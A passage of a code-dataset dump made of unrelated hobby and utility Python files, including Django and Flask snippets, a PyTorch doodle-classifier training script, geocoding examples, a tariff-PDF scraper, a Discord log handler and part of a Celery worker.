aggr[one_doc.topic].append(one_doc)\n\n for topic, docs in aggr.items():\n paginator = Paginator(docs, docs_on_page)\n if topic == section:\n page = paginator.get_page(page_number)\n else:\n page = paginator.get_page(init_page_num)\n aggr[topic] = page\n return render(request, \"index.html\", {'documents': aggr, 'topics': topics})\n\n\ndef document_read(request, doc_id):\n topics = _topics_with_documents()\n document = get_object_or_404(Documents, id=doc_id)\n return render(request, \"document.html\", {'document': document, 'topics': topics})\n\n\n@csrf_exempt\ndef user_comments(request, article_id):\n if request.method == 'POST':\n form = UserCommentsForm(request.POST)\n if form.is_valid():\n new_comment = Comments(text=request.POST['comment'], article_id_id=int(article_id))\n new_comment.save()\n return HttpResponse('
done
')\n if request.method == 'GET':\n data = serializers.serialize(\"json\", Comments.objects.filter(article_id=article_id))\n return HttpResponse(data, content_type='application/json')\n else:\n return HttpResponse({}, content_type='application/json')\n","sub_path":"python/django-projects/coookit_project/coookit/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"268795522","text":"# -*- encoding: utf-8 -*- \n# @Contact : ynatsu233@outlook.com\n# @Time : 2019/5/5 19:02 \n# @Author : Natsu Yuki\n\n\nfrom flask import *\nfrom exts import db\nfrom models_sql import Book\nimport config\n\napp = Flask(__name__)\n\napp.config.from_object(config)\n\ndb.init_app(app)\n\nwith app.app_context():\n db.create_all()\n\n\n@app.route('/')\ndef index():\n return 'Hello World !'\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"flaskScript.py","file_name":"flaskScript.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"429700022","text":"##\n## 12. April. 2021\n## introduction of python\n##\n\n#simple py\nlanguages = ['python', 'perl', 'c', 'java']\n\nfor lang in languages:\n if lang in ['python', 'perl']:\n print(\"%6s need interpreter\" % lang)\n elif lang in ['c', 'java']:\n print(\"%6s need compiler\" % lang)\n else:\n print(\"should not reach here\")\n\n#\na = 80\nb = 75\nc = 55\n(a+b+c) / 3 # float 형으로 나옴.\n(a+b+c) // 3 # 소수점 짤림.\n\n","sub_path":"0_basic/1 - basic skills/basic_of_python.py","file_name":"basic_of_python.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"5073627","text":"\n\nfrom xai.brain.wordbase.nouns._filtrate import _FILTRATE\n\n#calss header\nclass _FILTRATING(_FILTRATE, ):\n\tdef __init__(self,): \n\t\t_FILTRATE.__init__(self)\n\t\tself.name = \"FILTRATING\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"filtrate\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_filtrating.py","file_name":"_filtrating.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"508418865","text":"# https://www.geeksforgeeks.org/find-m-th-smallest-value-in-k-sorted-arrays/\n\n\"\"\"\n\nGiven k sorted arrays of possibly different sizes, find m-th smallest value in the merged array.\n\nExamples:\n\nInput: m = 5\n arr[][] = { {1, 3},\n {2, 4, 6},\n {0, 9, 10, 11}} ;\nOutput: 4\nExplanation The merged array would\nbe {0 1 2 3 4 6 9 10 11}. 
The 5-th\nsmallest element in this merged\narray is 4.\n\nInput: M = 2\n arr[][] = { {1, 3, 20},\n {2, 4, 6}} ;\nOutput: 2\n\nInput: M = 6\n arr[][] = { {1, 3, 20},\n {2, 4, 6}} ;\nOutput: 20\n\n\"\"\"\n\nimport heapq\n\n\ndef m_smallest(lists, M) -> int:\n if not lists:\n return -1\n\n min_heap = []\n\n for i, l in enumerate(lists):\n if l:\n heapq.heappush(min_heap, (l[0], i, 1))\n\n candidate = -1\n while min_heap and M > 0:\n min_val, i, j = heapq.heappop(min_heap)\n\n if j < len(lists[i]):\n heapq.heappush(min_heap, (lists[i][j], i, j + 1))\n\n candidate, M = min_val, M - 1\n\n return candidate\n\n\ndef _test(lists, M, expected):\n actual = m_smallest(lists, M)\n\n assert actual == expected, 'Wrong answer, expected: {}, actual: {}'.format(expected, actual)\n print('Accepted')\n\n\nif __name__ == '__main__':\n lists, M = [[1, 3], [2, 4, 6], [0, 9, 10, 11]], 5\n _test(lists, M, 4)\n\n lists, M = [[1, 3, 20], [2, 4, 6]], 2\n _test(lists, M, 2)\n\n lists, M = [[1, 3, 20], [2, 4, 6]], 6\n _test(lists, M, 20)\n","sub_path":"Problems/companies/Facebook/Find_mth_smallest_in_k_sorted_arrays.py","file_name":"Find_mth_smallest_in_k_sorted_arrays.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"349790061","text":"#1 2 3 4 5 6 \ndef getAvg(arr):\n sumi=0\n n = len(arr)\n for i in arr:\n sumi = sumi + i\n print(sumi/n)\n\nnumbers=[int(i) for i in input().split()]\nnewnumbers=[-1,0,1,2,3,-4]\ngetAvg(arr=numbers)\ngetAvg(arr=newnumbers)","sub_path":"lesson8/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"417280545","text":"def numberOfPaths(p, q):\n # Create a 1D array to store\n # results of subproblems\n dp = [1]*q\n for i in range(p - 1):\n for j in range(1, q):\n dp[j] += dp[j - 1]\n return dp[q - 1]\n\nprint(numberOfPaths(3, 3))","sub_path":"TotalNumberOfwayTorReachMatrix.py","file_name":"TotalNumberOfwayTorReachMatrix.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"428469020","text":"# 2001-2009\n\nimport urllib.request, urllib.parse\nimport re\nimport os\nimport _locale\n\n_locale._getdefaultlocale = (lambda *args: ['en_US', 'utf8'])\n\ndef shellghost(pdfLinkList, fileNames):\n for i in range(len(pdfLinkList)):\n os.system('curl ' + pdfLinkList[i] + ' --output ' + fileNames[i] + '.pdf')\n os.system('gs -sDEVICE=txtwrite -o ' + fileNames[i] + '.txt ' + fileNames[i] + '.pdf')\n\n\ndef main(name):\n #srcfile = 'dataFile/' + name\n code = name[-2:]\n f = open(name + '.txt', 'r')\n filename = name + 'resolve.txt'\n file1 = open(filename, 'w+')\n content = f.read()\n ten_digit = re.compile(r'(\\d{4}\\.\\d{2}\\.\\d{2}\\s+(?:\\d{2})?)', flags=re.M)\n ten_digit_list = ten_digit.findall(content)\n array = []\n for i in range(len(ten_digit_list)):\n if ten_digit_list[i][0:2] == code:\n parsetwodigit(ten_digit_list, i, content, array)\n\n array = list(dict.fromkeys(array))\n for j in range(len(array)):\n temp = array[j]\n if len(temp) > 10:\n print(temp)\n\n file1.write(str(array))\n file1.close()\n f.close()\n\ndef special(name):\n f = open(name + '.txt', 'r')\n filename = name + 'resolve.txt'\n file1 = open(filename, 'w+')\n content = f.read()\n eight_digit = re.compile(r'(\\d{4}\\.\\d{2}\\.\\d{2})\\s{2,3}', flags=re.M)\n eight_digit_list = eight_digit.findall(content)\n array = []\n 
for i in range(len(eight_digit_list)):\n array.append(eight_digit_list[i])\n array = list(dict.fromkeys(array))\n result = []\n\n # if len(name) == 7:\n # newcode = name[-2:]\n # else:\n # code = name[-3:]\n # newcode = code[0:2] + '0' + code[-1]\n for j in range(len(array)):\n temp = array[j].replace(\"\\n\", \"\")\n temp = temp.replace(\" \", \"\")\n temp = temp.replace(\".\", \"\")\n result.append(temp)\n # if temp[0:4] == newcode and len(name) != 7:\n # result.append(temp)\n # if temp[0:2] == newcode and len(name) == 7:\n # result.append(temp)\n\n file1.write(str(result))\n file1.close()\n f.close()\n\n\ndef parsetwodigit(tendigitlist, i, content, array):\n if i == len(tendigitlist) - 1 :\n var = tendigitlist[i] + '(.+)'\n else:\n var = tendigitlist[i] + '(.+)' + tendigitlist[i + 1]\n pattern = re.compile(var, flags=re.M | re.DOTALL)\n pattern_list = pattern.findall(content)\n if len(pattern_list) == 0:\n print(tendigitlist[i])\n two_digit = re.compile('\\s\\s(\\d{2})\\s', flags=re.M)\n two_digit_list = two_digit.findall(pattern_list[0])\n temp = tendigitlist[i].replace(\"\\n\", \"\")\n temp = temp.replace(\" \", \"\")\n temp = temp.replace(\".\", \"\")\n # special case for chapter 98\n if len(two_digit_list) == 0:\n array.append(temp)\n for j in range(len(two_digit_list)):\n if len(temp) == 10:\n array.append(temp)\n string = temp[0:8] + two_digit_list[j]\n else:\n string = temp + two_digit_list[j]\n array.append(string)\n\nyear = '09'\n# todo: change according to the years\nurl = 'https://www.usitc.gov/tata/hts/bychapter/basic09.htm'\nresponse = urllib.request.urlopen(url)\nwebContent = str(response.read())\npdfLink = re.compile(r'(\\/publications\\/docs\\/tata\\/hts\\/bychapter\\/0900c\\d{2,3}(?:_\\d{1})?.pdf)', flags=re.M)\npdfLinkList = pdfLink.findall(webContent)\nprint(pdfLinkList)\nfor i in range(len(pdfLinkList)):\n pdfLinkList[i] = 'https://www.usitc.gov/' + pdfLinkList[i]\n\n# todo: change according to the years\npdfshort = re.compile(r'\\/(' + year + '00c\\d{2,3})(?:_\\d)?\\.pdf', flags=re.M)\nfileNames = pdfshort.findall(str(pdfLinkList))\n# shellghost(pdfLinkList, fileNames)\n\nfor i in range(len(fileNames)):\n if fileNames[i][-2:] == '99':\n special(fileNames[i])\n print(fileNames[i])\n else:\n main(fileNames[i])\n print(fileNames[i])\n\n# if __name__ == '__main__':\n# special('0200c99')\n# 2001-2002 link\n# url = 'https://www.usitc.gov/tata/hts/archive/' + year + '00/20' + year +'_basic_index.htm'\n# pdfLink = re.compile(r'(\\/tata\\/hts\\/archive\\/' + year + '00\\/'+ year + '00c\\d{2,3}\\.pdf)', flags=re.M)\n# 2003 link\n# url = 'https://www.usitc.gov/tata/hts/archive/20' + year +'/index.htm'\n# pdfLink = re.compile(r'(\\/publications\\/tariff_chapters_2003basic\\/' + year + '00c\\d{2,3}\\.pdf)', flags=re.M)\n# 2004-2008\n# url = 'https://www.usitc.gov/tata/hts/bychapter/_' + year +'00.htm'\n# pdfLink = re.compile(r'(\\/publications\\/docs\\/tata\\/hts\\/bychapter\\/' + year + '00c\\d{2,3}\\.pdf)', flags=re.M)\n# 2009\n# url = 'https://www.usitc.gov/tata/hts/bychapter/basic09.htm'\n# pdfLink = re.compile(r'(\\/publications\\/docs\\/tata\\/hts\\/bychapter\\/0900c\\d{2,3}_\\d{1}\\.pdf)', flags=re.M)\n# _number pdfshort = re.compile(r'\\/(0900c\\d{2,3}_\\d{1})\\.pdf', flags=re.M)\n# for i in range(len(fileNames)):\n# main(fileNames[i])\n# name = name[0:7]\n\n","sub_path":"dataFile/downloadpage200X.py","file_name":"downloadpage200X.py","file_ext":"py","file_size_in_byte":4838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} 
+{"seq_id":"210101171","text":"# coding=utf-8\n\n# Query position by google map.\n# MyGEO / requests / http.client / socket\n\nimport requests\nimport json\nimport http.client\nimport socket\n\nclass MyGEO:\n def __init__(self):\n return\n \n def GetResult(self, address):\n response = requests.get(\"https://maps.googleapis.com/maps/api/geocode/json\", params={\"sensor\":\"false\", \"address\":address})\n response_json = response.json()\n if response_json[\"status\"] == \"OK\": \n return response_json[\"results\"][0][\"geometry\"][\"location\"]\n \n return [0., 0.]\n\ndef UsingRequests(address):\n response = requests.get(\"https://maps.googleapis.com/maps/api/geocode/json\", params={\"sensor\":\"false\", \"address\":address})\n response_json = response.json()\n if response_json[\"status\"] == \"OK\": \n return response_json[\"results\"][0][\"geometry\"][\"location\"]\n \n return [0., 0.]\n\ndef UsingHTTP(address):\n connection = http.client.HTTPConnection(\"maps.googleapis.com\")\n connection.request(\"GET\", \"/maps/api/geocode/json?address={0}&sensor=false\".format(address))\n response_json = json.loads(connection.getresponse().read())\n if response_json[\"status\"] == \"OK\": \n return response_json[\"results\"][0][\"geometry\"][\"location\"]\n \n \n return [0., 0.]\n \ndef UsingSocket(address):\n connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)\n connection.connect((\"maps.google.com\", 80))\n \n request_message = \"\"\"\\\nGET /maps/api/geocode/json?address={0}&sensor=false HTTP/1.1\\r\\n\\\nHOST: maps.google.com:80\\r\\n\\\nUser-Agent: Bihuchao\\r\\n\\\nConnection: Close\\r\\n\\\n\\r\\n\\\n \"\"\"\n \n connection.sendall(request_message.format(address).encode(\"ascii\"))\n \n data = b\"\"\n while(True):\n size = connection.recv(1024)\n if not size:\n break\n data += size\n \n response_json = json.loads(data.decode(\"utf-8\").split(\"\\r\\n\\r\\n\")[1])\n\n if response_json[\"status\"] == \"OK\": \n return response_json[\"results\"][0][\"geometry\"][\"location\"]\n \n return [0., 0.]\n\nif __name__ == \"__main__\":\n # using MyGEO\n result = MyGEO().GetResult(\"taiyuan\")\n print(\"%.2f %.2f\" % (result[\"lat\"], result[\"lng\"]))\n \n # using requests \n result = UsingRequests(\"taiyuan\")\n print(\"%.2f %.2f\" % (result[\"lat\"], result[\"lng\"]))\n \n # using http\n result = UsingHTTP(\"taiyuan\")\n print(\"%.2f %.2f\" % (result[\"lat\"], result[\"lng\"]))\n \n # using sokcet\n result = UsingSocket(\"taiyuan\")\n print(\"%.2f %.2f\" % (result[\"lat\"], result[\"lng\"]))\n \n","sub_path":"CodeOfPythonNetWorkProgramming/01/01_sendrequest.py","file_name":"01_sendrequest.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"91685592","text":"# Zadanie 4\n# Napisz skrypt, który zapyta uzytkownika o trzy liczby calkowite,\n# a nastepnie pomnoz dwa pierwsze. przed podzieleniem wyniku przez trzecia liczbe. 
\n# Wejscie i wyjscie powinny byc zrozumiale dla uzytkownika.\n\nnum1 = int(input(\"Podaj pierwsza liczbe: \"))\nnum2 = int(input(\"Podaj druga liczbe: \"))\nnum3 = int(input(\"Podaj trzecia liczbe: \"))\n\nresult = num1 * num2 / num3\n\nprint(\"Wynik wynosi:\", result)","sub_path":"section2/exercise_4.py","file_name":"exercise_4.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"62207524","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport os\nos.environ['CUDA_VISIBLE_DEVICES'] = '1,2,3,8,9,12' #'3,2,1,0'\nimport sys\nsys.path.append(\"..\")\nfrom common import *\nfrom data import *\nfrom imgaug import augmenters as iaa\n\n##----------------------------------------\nfrom model_seresnext101 import *\n# from model_resnet34 import *\nimport gc\n\n\n# In[2]:\n#net = Net().to('cuda:0')\n#print(next(net.parameters()).is_cuda)\n\n#net = nn.DataParallel(net)\n#net.cuda()\n#print(next(net.parameters()).is_cuda)\n#print(net.weights)\n#print(type(net))\n\nFILE_NAME = '100k'\nSIZE = 196\n\n# In[3]:\n\n\ndef mixup_data(x, y, alpha=4.0, use_cuda=True):\n '''Returns mixed inputs, pairs of targets, and lambda'''\n if alpha > 0:\n lam = np.random.beta(alpha, alpha)\n else:\n lam = 1\n\n batch_size = x.size()[0]\n if use_cuda:\n index = torch.randperm(batch_size).cuda()\n else:\n index = torch.randperm(batch_size)\n\n mixed_x = lam * x + (1 - lam) * x[index, :]\n y_a, y_b = y, y[index]\n return mixed_x, y_a, y_b, lam\n\n\ndef mixup_criterion(criterion, pred, y_a, y_b, lam):\n return lam * criterion(pred, y_a) + (1 - lam) * criterion(pred, y_b)\n\n\n# In[4]:\n\n\ndef valid_augment(drawing, label, index):\n# image = drawing_to_image_with_color_v2(drawing, 96, 96)\n seq = iaa.Sequential([\n iaa.Crop(percent=(0.05, 0.05, \\\n 0.05, 0.05), keep_size=True)\n ])\n image = drawing_to_image_with_color_aug(drawing, SIZE, SIZE, seq)\n return image, label, None\n\n\ndef train_augment(drawing, label, index):\n up_rand = np.random.random()\n right_rand = np.random.random()\n percent_crop = 0.1\n seq = iaa.Sequential([\n iaa.Fliplr(0.5),\n iaa.Crop(percent=(up_rand*percent_crop, right_rand*percent_crop, \\\n (1-up_rand)*percent_crop, (1-right_rand)*percent_crop), keep_size=True)\n ])\n \n image = drawing_to_image_with_color_aug(drawing, SIZE, SIZE, seq)\n# image = drawing_to_image_with_color_v2(drawing, 96, 96)\n return image, label, None\n\n\n# In[5]:\n\n\n### training ##############################################################\n\ndef do_valid( net, valid_loader, criterion ):\n\n valid_num = 0\n probs = []\n truths = []\n losses = []\n corrects = []\n\n for input, truth, cache in valid_loader:\n input = input.to('cuda:0')\n truth = truth.to('cuda:0')\n\n with torch.no_grad():\n logit = net(input)#data_parallel(net,input)#net(input)\n prob = F.softmax(logit,1)\n\n loss = criterion(logit, truth, False)\n correct = metric(logit, truth, False)\n\n valid_num += len(input)\n probs.append(prob.data.cpu().numpy())\n losses.append(loss.data.cpu().numpy())\n corrects.append(correct.data.cpu().numpy())\n truths.append(truth.data.cpu().numpy())\n\n\n assert(valid_num == len(valid_loader.sampler))\n #------------------------------------------------------\n prob = np.concatenate(probs)\n correct = np.concatenate(corrects)\n truth = np.concatenate(truths).astype(np.int32).reshape(-1,1)\n loss = np.concatenate(losses)\n\n\n #---\n #top = np.argsort(-predict,1)[:,:3]\n\n loss = loss.mean()\n correct = 
correct.mean(0)\n\n top = [correct[0], correct[0]+correct[1], correct[0]+correct[1]+correct[2]]\n precision = correct[0]/1 + correct[1]/2 + correct[2]/3\n\n #----\n valid_loss = np.array([\n loss, top[0], top[2], precision\n ])\n\n return valid_loss\n\n\n# In[6]:\n\n\nfold = 0\nout_dir = '../../output'\ninitial_checkpoint = '/rscratch/xuanyu/KAIL/Kaggle_Doddle_Rank1/Alexander/output/checkpoint/00102000_model.pth'#'densenet201.pth'#None #\\\n #'../../output/backup/873_crop.pth'\n\npretrain_file = None\n\nbatch_size = 512+64\nepoch = 20\nnum_iters = epoch * 340 * 100000 // batch_size\n\n# schduler = NullScheduler(lr=0.01)\nschduler = DecayScheduler(base_lr=0.001, decay=0.1, step=num_iters/2)\niter_save_interval = 2000\ncriterion = softmax_cross_entropy_criterion\n\n\n## setup -----------------------------------------------------------------------------\nos.makedirs(out_dir +'/checkpoint', exist_ok=True)\nos.makedirs(out_dir +'/train', exist_ok=True)\nos.makedirs(out_dir +'/backup', exist_ok=True)\n# backup_project_as_zip(PROJECT_PATH, out_dir +'/backup/code.train.%s.zip'%IDENTIFIER)\n\nlog = Logger()\nlog.open(out_dir+'/log.train_r50_add_crop.txt',mode='a')\nlog.write('\\n--- [START %s] %s\\n\\n' % (IDENTIFIER, '-' * 64))\nlog.write('\\tSEED = %u\\n' % SEED)\nlog.write('\\tPROJECT_PATH = %s\\n' % PROJECT_PATH)\nlog.write('\\t__file__ = %s\\n' % FILE_NAME)\nlog.write('\\tout_dir = %s\\n' % out_dir)\nlog.write('\\n')\nlog.write('\\t\\n')\nlog.write('\\t ... xxx baseline ... \\n')\nlog.write('\\n')\n\n\n## dataset ----------------------------------------\nlog.write('** dataset setting **\\n')\n\ntrain_dataset = DoodleDataset('train', 'train_0', train_augment)\ntrain_loader = DataLoader(\n train_dataset,\n #sampler = FixLengthRandomSamplerWithProbability(train_dataset, probability),\n #sampler = FixLengthRandomSampler(train_dataset),\n #sampler = ConstantSampler(train_dataset,[31]*batch_size*100),\n sampler = RandomSampler(train_dataset),\n batch_size = batch_size,\n num_workers = 15,\n drop_last = True,\n pin_memory = False,\n collate_fn = null_collate)\n\nvalid_dataset = DoodleDataset('valid', 'valid_0', valid_augment)\nvalid_loader = DataLoader(\n valid_dataset,\n #sampler = SequentialSampler(valid_dataset),\n sampler = RandomSampler(valid_dataset),\n batch_size = batch_size,\n num_workers = 15,\n drop_last = False,\n pin_memory = True,\n collate_fn = null_collate)\n\n\nassert(len(train_dataset)>=batch_size)\nlog.write('batch_size = %d\\n'%(batch_size))\nlog.write('train_dataset : \\n%s\\n'%(train_dataset))\nlog.write('valid_dataset : \\n%s\\n'%(valid_dataset))\nlog.write('\\n')\n\n## net ----------------------------------------\nlog.write('** net setting **\\n')\n#net = Net().cuda()\nnet = Net().to('cuda:0')\nnet = nn.DataParallel(net)\nnet.cuda()\n#cudnn.benchmark = True\n\nif initial_checkpoint is not None:\n log.write('\\tinitial_checkpoint = %s\\n' % initial_checkpoint)\n net.load_state_dict(torch.load(initial_checkpoint, map_location=lambda storage, loc: storage))\n#net = nn.DataParallel(net)\n#net.cuda()\n\n\n# In[ ]:\n\n\nlog.write('%s\\n'%(type(net)))\nlog.write('criterion=%s\\n'%criterion)\nlog.write('\\n')\n\n\n## optimiser ----------------------------------\nif 0: ##freeze\n for p in net.resnet.parameters(): p.requires_grad = False\n for p in net.encoder1.parameters(): p.requires_grad = False\n for p in net.encoder2.parameters(): p.requires_grad = False\n for p in net.encoder3.parameters(): p.requires_grad = False\n for p in net.encoder4.parameters(): p.requires_grad = False\n 
pass\n\n#net.set_mode('train',is_freeze_bn=True)\n#-----------------------------------------------\n\n\noptimizer = optim.SGD(filter(lambda p: p.requires_grad, net.parameters()),\n lr=schduler.get_rate(0), momentum=0.9, weight_decay=0.0001)\n\n\niter_smooth = 20\niter_log = 50\niter_valid = 2500\niter_save = [0, num_iters-1] + list(range(0, num_iters, iter_save_interval))#1*1000\n\nstart_iter = 102000\nstart_epoch= 0\nrate = 0\nif initial_checkpoint is not None:\n# initial_optimizer = initial_checkpoint.replace('_model.pth','_optimizer.pth')\n# checkpoint = torch.load(initial_optimizer)\n# start_iter = checkpoint['iter' ]\n# start_epoch = checkpoint['epoch']\n\n #rate = get_learning_rate(optimizer) #load all except learning rate\n #optimizer.load_state_dict(checkpoint['optimizer'])\n #adjust_learning_rate(optimizer, rate)\n pass\n\n\n\n\nlog.write('schduler\\n %s\\n'%(schduler))\nlog.write('\\n')\n\n## start training here! ##############################################\nlog.write('** start training here! **\\n')\nlog.write(' |------------ VALID -------------|-------- TRAIN/BATCH ----------| \\n')\nlog.write('rate iter epoch | loss acc-1 acc-3 lb | loss acc-1 acc-3 lb | time \\n')\nlog.write('----------------------------------------------------------------------------------------------------\\n')\n\n\ntrain_loss = np.zeros(6,np.float32)\nvalid_loss = np.zeros(6,np.float32)\nbatch_loss = np.zeros(6,np.float32)\niter = 0\ni = 0\nlast_max_lb = -1\n\n\nstart = timer()\nwhile iter 0:\n await self.bot.send_message(self.channel, \"\\n\".join(self.buffer))\n self.buffer.clear()\n await asyncio.sleep(5)\n \n def close(self):\n self.run = False\n self.buffer.clear()\n super.close()\n\nclass DiscordLoggingFormatter(logging.Formatter):\n def format(self, r):\n msg = re.sub(r\"\\u001b\\[\\d+(?:;\\d+)?m\", \"\", r.msg)\n return f\"``{r.levelname}:{r.name}@{datetime.now()}\\n{msg}``\"\n","sub_path":"util/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"259593073","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n''' Программа выводит название региона РФ по коду с номера автомобиля\nвводим значение и получаем результат. \n'''\n# Используем колораму для подсветки\nfrom colorama import Fore, Back, Style\n\n# Открываем файл на чтение\nf = open('short.db', 'r', encoding='UTF-8')\n\nd = {}\n# Читаем файл в память\nfor line in f:\n kv = line.split(':')\n key = kv[0]\n value = kv[1]\n\n d[key] = value\n\n\ndef vvod():\n # Здесь мы работаем с юзером\n print(Style.RESET_ALL + \"Введите код региона! 
0 - для выхода\")\n code = input()\n if code == '0':\n exit(0)\n exist_key = code in d\n if exist_key == False:\n print(Fore.RED + 'Такого кода в базе нет!')\n vvod()\n\n print(Fore.GREEN + d[code])\n vvod()\n\n\nvvod()\n","sub_path":"code_r2.py","file_name":"code_r2.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"384492573","text":"import atexit\nimport logging\nimport multiprocessing\nimport platform as _platform\nimport os\nimport socket\nimport sys\nimport warnings\n\nfrom celery import __version__\nfrom celery import platforms\nfrom celery import signals\nfrom celery.exceptions import ImproperlyConfigured\nfrom celery.routes import Router\nfrom celery.task import discard_all\nfrom celery.utils import get_full_cls_name, LOG_LEVELS\nfrom celery.utils import info\nfrom celery.utils import term\nfrom celery.worker import WorkController\n\n\nSYSTEM = _platform.system()\nIS_OSX = SYSTEM == \"Darwin\"\n\nSTARTUP_INFO_FMT = \"\"\"\nConfiguration ->\n . broker -> %(conninfo)s\n . queues ->\n%(queues)s\n . concurrency -> %(concurrency)s\n . loader -> %(loader)s\n . logfile -> %(logfile)s@%(loglevel)s\n . events -> %(events)s\n . beat -> %(celerybeat)s\n%(tasks)s\n\"\"\".strip()\n\nTASK_LIST_FMT = \"\"\" . tasks ->\\n%s\"\"\"\n\n\nclass Worker(object):\n WorkController = WorkController\n\n def __init__(self, concurrency=None, loglevel=None, logfile=None,\n hostname=None, discard=False, run_clockservice=False,\n schedule=None, task_time_limit=None, task_soft_time_limit=None,\n max_tasks_per_child=None, queues=None, events=False, db=None,\n include=None, defaults=None, pidfile=None,\n redirect_stdouts=None, redirect_stdouts_level=None, **kwargs):\n if defaults is None:\n from celery import conf\n defaults = conf\n self.defaults = defaults\n self.concurrency = (concurrency or\n defaults.CELERYD_CONCURRENCY or\n multiprocessing.cpu_count())\n self.loglevel = loglevel or defaults.CELERYD_LOG_LEVEL\n self.logfile = logfile or defaults.CELERYD_LOG_FILE\n self.hostname = hostname or socket.gethostname()\n self.discard = discard\n self.run_clockservice = run_clockservice\n self.schedule = schedule or defaults.CELERYBEAT_SCHEDULE_FILENAME\n self.events = events\n self.task_time_limit = (task_time_limit or\n defaults.CELERYD_TASK_TIME_LIMIT)\n self.task_soft_time_limit = (task_soft_time_limit or\n defaults.CELERYD_TASK_SOFT_TIME_LIMIT)\n self.max_tasks_per_child = (max_tasks_per_child or\n defaults.CELERYD_MAX_TASKS_PER_CHILD)\n self.redirect_stdouts = (redirect_stdouts or\n defaults.REDIRECT_STDOUTS)\n self.redirect_stdouts_level = (redirect_stdouts_level or\n defaults.REDIRECT_STDOUTS_LEVEL)\n self.db = db\n self.queues = queues or []\n self.include = include or []\n self.pidfile = pidfile\n self._isatty = sys.stdout.isatty()\n self.colored = term.colored(enabled=defaults.CELERYD_LOG_COLOR)\n\n if isinstance(self.queues, basestring):\n self.queues = self.queues.split(\",\")\n if isinstance(self.include, basestring):\n self.include = self.include.split(\",\")\n\n if not isinstance(self.loglevel, int):\n try:\n self.loglevel = LOG_LEVELS[self.loglevel.upper()]\n except KeyError:\n self.die(\"Unknown level %r. 
Please use one of %s.\" % (\n self.loglevel,\n \"|\".join(l for l in LOG_LEVELS.keys()\n if isinstance(l, basestring))))\n\n def run(self):\n self.init_loader()\n self.init_queues()\n self.worker_init()\n self.redirect_stdouts_to_logger()\n print(str(self.colored.cyan(\n \"celery@%s v%s is starting.\" % (self.hostname, __version__))))\n\n if getattr(os, \"geteuid\", None) and os.geteuid() == 0:\n warnings.warn(\n \"Running celeryd with superuser privileges is not encouraged!\")\n\n if getattr(self.settings, \"DEBUG\", False):\n warnings.warn(\"Using settings.DEBUG leads to a memory leak, \"\n \"never use this setting in a production environment!\")\n\n if self.discard:\n self.purge_messages()\n\n # Dump configuration to screen so we have some basic information\n # for when users sends bug reports.\n print(str(self.colored.reset(\" \\n\", self.startup_info())))\n self.set_process_status(\"Running...\")\n\n self.run_worker()\n\n def on_listener_ready(self, listener):\n signals.worker_ready.send(sender=listener)\n print(\"celery@%s has started.\" % self.hostname)\n\n def init_queues(self):\n conf = self.defaults\n if self.queues:\n conf.QUEUES = dict((queue, options)\n for queue, options in conf.QUEUES.items()\n if queue in self.queues)\n for queue in self.queues:\n if queue not in conf.QUEUES:\n if conf.CREATE_MISSING_QUEUES:\n Router(queues=conf.QUEUES).add_queue(queue)\n else:\n raise ImproperlyConfigured(\n \"Queue '%s' not defined in CELERY_QUEUES\" % queue)\n\n def init_loader(self):\n from celery.loaders import current_loader, load_settings\n self.loader = current_loader()\n self.settings = load_settings()\n if not self.loader.configured:\n raise ImproperlyConfigured(\n \"Celery needs to be configured to run celeryd.\")\n map(self.loader.import_module, self.include)\n\n def redirect_stdouts_to_logger(self):\n from celery import log\n handled = log.setup_logging_subsystem(loglevel=self.loglevel,\n logfile=self.logfile)\n # Redirect stdout/stderr to our logger.\n if not handled:\n logger = log.get_default_logger()\n if self.redirect_stdouts:\n log.redirect_stdouts_to_logger(logger,\n loglevel=self.redirect_stdouts_level)\n\n def purge_messages(self):\n discarded_count = discard_all()\n what = discarded_count > 1 and \"messages\" or \"message\"\n print(\"discard: Erased %d %s from the queue.\\n\" % (\n discarded_count, what))\n\n def worker_init(self):\n # Run the worker init handler.\n # (Usually imports task modules and such.)\n self.loader.init_worker()\n\n def tasklist(self, include_builtins=True):\n from celery.registry import tasks\n tasklist = tasks.keys()\n if not include_builtins:\n tasklist = filter(lambda s: not s.startswith(\"celery.\"),\n tasklist)\n return TASK_LIST_FMT % \"\\n\".join(\"\\t. 
